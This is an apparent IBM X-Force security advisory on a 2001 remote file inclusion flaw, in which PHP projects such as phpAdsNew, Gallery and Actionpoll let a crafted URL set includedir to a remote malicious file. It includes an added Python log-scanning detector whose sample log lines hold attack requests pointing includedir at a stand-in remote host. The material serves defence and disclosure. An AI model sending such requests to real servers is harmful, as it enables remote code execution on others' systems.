Multiple vendor open-source PHP projects could allow remote command execution

php-includedir-code-execution (7215) The risk level is classified as High Risk

Description:

Multiple open-source projects written in PHP could allow a remote attacker to execute arbitrary commands on the Web server, caused by a vulnerability in the way the $includedir variable handles user-supplied input. A remote attacker can send the server a specially crafted URL that sets the $includedir variable to point to a malicious file containing PHP code, which is then executed on the host. An attacker can use this vulnerability to execute commands on the Web server with the privileges of the Web server process.
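
A detection check for the request pattern described above, added here as an example and not part of the original advisory: it scans Web server access log lines for query strings that set includedir or phormationdir (the two variable names in the CVE entries below) and marks values that are URLs. The log lines, addresses, hosts and most paths are constructed samples, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variable names taken from the advisory's CVE entries.
SUSPECT_PARAMS = {"includedir", "phormationdir"}
# A value beginning with "scheme://" or "//" names a remote host.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses, hosts and paths are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Oct/2001:17:01:12 -0500] "GET /ads/index.php?zone=3 HTTP/1.0" 200 5120
192.0.2.44 - - [02/Oct/2001:17:02:40 -0500] "GET /ads/helperfunction.php?includedir=http%3A%2F%2Fhost.example.invalid%2Fx HTTP/1.0" 200 312
192.0.2.44 - - [02/Oct/2001:17:02:55 -0500] "GET /forms/form.php?phormationdir=ftp://host.example.invalid/pub HTTP/1.0" 200 298
192.0.2.61 - - [02/Oct/2001:17:05:03 -0500] "GET /poll/poll.php?includedir=lib HTTP/1.0" 200 2210
"""

def flag_request(target):
    """Return (param, decoded_value, is_remote) for each suspect parameter."""
    hits = []
    # parse_qsl percent-decodes values, so encoded URLs are matched too.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in SUSPECT_PARAMS:
            hits.append((name, value, bool(REMOTE_VALUE.match(value))))
    return hits

def scan_log(text):
    """Return (line_number, param, value, verdict) for every flagged request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for param, value, remote in flag_request(m.group(1)):
            # Any request that sets the include path is worth a look;
            # a URL value is the remote-inclusion case the advisory describes.
            verdict = "remote-url" if remote else "request-set"
            findings.append((lineno, param, value, verdict))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a variable set through a POST body or a cookie is not visible to this check.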


Consequences:

Gain Privileges

Remedy:

For phpAdsNew 2.0 beta 5:
Upgrade to the latest version of phpAdsNew (2 dev 09102001 or later), available from the SourceForge Web site - Project: phpAdsNew. See References.

For other distributions:
Contact your vendor for patch or upgrade information.

References:

  • AWOL Web site: Project details for AWOL.
  • BugTraq Mailing List, Tue Oct 02 2001 - 16:59:09 CDT: results of semi-automatic source code audit.
  • CCCSoftware Web site: CCC.
  • Empris Web site: Empris.
  • more.groupware Web site: latest news.
  • myphpPagetool Web site: Welcome to myphpPagetool.
  • PeaceWorks Computer Consulting Web site: Phormation.
  • Phorecast Web site: What is Phorecast?.
  • pSlash Web site: pSlash Web Portal System.
  • SourceForge.net: Project: phpAdsNew.
  • SourceForge.net: Project: Gallery.
  • SourceForge.net: Project: ActionPoll.
  • SourceForge.net: Project: Dark Hart Portal.
  • SourceForge.net: Project: SIPS.
  • Webodex Web site: Webodex.
  • BID-3383: Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability
  • BID-3384: Actionpoll Remote Arbitrary Code Execution Vulnerability
  • BID-3385: Grant Horwood Webodex Remote Arbitrary Code Execution Vulnerability
  • BID-3386: Zorbat ZorbStats Remote Arbitrary Code Execution Vulnerability
  • BID-3387: AWOL Remote Arbitrary Code Execution Vulnerability
  • BID-3388: Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
  • BID-3389: CCC Remote Arbitrary Code Execution Vulnerability
  • BID-3390: Dark Hart Portal Remote Arbitrary Code Execution Vulnerability
  • BID-3391: Empris Remote Arbitrary Code Execution Vulnerability
  • BID-3392: PHPAdsNew Remote Arbitrary Code Execution Vulnerability
  • BID-3393: Peaceworks Computer Consulting Phormation Remote Arbitrary Code Execution Vulnerability
  • BID-3394: Sebastian Bunka myphpPagetool Arbitrary Code Execution Vulnerability
  • BID-3395: Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability
  • BID-3396: Haakon Nilsen SIPS Remote Arbitrary Code Execution Vulnerability
  • BID-3397: Bharat Mediratta Gallery Remote Arbitrary Code Execution Vulnerability
  • CVE-2001-1048: AWOL PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1049: Phorecast PHP script before 0.40 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1050: CCCSoftware CCC PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1051: Dark Hart Portal (darkportal) PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1052: Empris PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1054: PHPAdsNew PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1234: Bharat Mediratta Gallery PHP script before 1.2.1 allows remote attackers to execute arbitrary code by including files from remote web sites via an HTTP request that modifies the includedir variable.
  • CVE-2001-1235: pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
  • CVE-2001-1236: myphpPagetool PHP script 0.4.3-1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
  • CVE-2001-1237: Phormation PHP script 0.9.1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the phormationdir variable.
  • CVE-2001-1296: More.groupware PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1297: PHP remote file inclusion vulnerability in Actionpoll PHP script before 1.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter.
  • CVE-2001-1298: Webodex PHP script 1.0 and earlier allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1299: Zorbat Zorbstats PHP script before 0.9 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • OSVDB ID: 13058: Empris includedir Parameter Remote File Inclusion
  • OSVDB ID: 13059: CCCSoftware CCC includedir Remote File Inclusion
  • OSVDB ID: 13060: Dark Hart Portal darkportal includedir Remote File Inclusion
  • OSVDB ID: 13090: Webodex CGI Script Remote File Inclusion
  • OSVDB ID: 1959: AWOL helperfunction.php includedir Parameter Remote File Inclusion
  • OSVDB ID: 1960: Actionpoll includedir Remote File Inclusion
  • OSVDB ID: 1961: ZorbStats includedir Remote File Inclusion
  • OSVDB ID: 1962: Phorecast Arbitrary File Inclusion
  • OSVDB ID: 1963: phpAdsNew helperfunction.php Remote File Inclusion
  • OSVDB ID: 1964: Phormation phormationdir Arbitrary File Inclusion
  • OSVDB ID: 1965: myphpPagetool helperfunction.php includedir Parameter Remote File Inclusion
  • OSVDB ID: 1966: pSlash includedir Parameter Remote File Inclusion
  • OSVDB ID: 1967: Bharat Mediratta Gallery includedir Parameter Remote File Inclusion
  • OSVDB ID: 35356: ActionPoll actionpoll.php CONFIG_POLLDB Parameter Remote File Inclusion
  • OSVDB ID: 35357: ActionPoll db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion
  • OSVDB ID: 37417: ActionPoll db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion
  • OSVDB ID: 5433: More.groupware Remote File Inclusion
  • US-CERT VU#847803: Php variables passed from the browser are stored in global context

Platforms Affected:

  • CCCSoftware CCC 1.03 and prior
  • Chris DeRosia (topher1kenobe) AWOL 2.1 and prior
  • Dark Hart Design DarkPortal-unix 0.1.18 and prior
  • Empris Empris 0.4
  • Gallery Gallery 1.2.1
  • Grant Horwood Webodex 1.0
  • Haakon Nilsen Simple Internet Publishing System (SIPS) 0.3
  • more.groupware Development Team Moregroupware 0.5.1
  • Paul M. Jones Phorecast 0.30a
  • PeaceWorks Computer Consulting Phormation 0.9.1
  • pSlash pSlash 0.70
  • Sebastian Bunka myphpPagetool 0.4.3-1 and prior
  • Tobias Ratschiller phpAdsNew 2.0 beta 5
  • VCL Components Actionpoll 1.1.1
  • Zorbat Zorbstats 0.8

Reported:

Oct 02, 2001

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@us.ibm.com
